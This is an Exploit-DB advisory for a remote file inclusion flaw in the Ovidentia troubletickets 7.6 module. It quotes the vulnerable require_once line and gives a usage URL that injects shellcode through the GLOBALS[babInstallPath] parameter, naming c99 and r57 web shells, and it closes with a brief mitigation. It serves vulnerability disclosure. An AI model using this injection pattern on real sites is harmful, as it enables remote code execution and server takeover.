Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability

vendor:

Ovidentia Module troubletickets

by:

bd0rk

8,8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Ovidentia Module troubletickets

Affected Version From: 7.6

Affected Version To: 7.6

Patch Exists: YES

Related CWE: N/A

CPE: a:ovidentia:ovidentia_module_troubletickets

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability

The GLOBALS[babInstallPath]-parameter isn't declared before require_once, so an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.

Mitigation:

Declare the GLOBALS[babInstallPath] parameter or use an alert.

Source

Exploit-DB raw data:

# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
# Author: bd0rk || SCHOOL-OF-HACK.NET
# eMail: bd0rk[at]hackermail.com
# Website: http://www.school-of-hack.net
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838

Proof-of-Concept:

Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]

The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
             So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
             It's no problem to patch it!
             Declare this parameter or use an alert!


Greetings from bd0rk. HackThePlanet!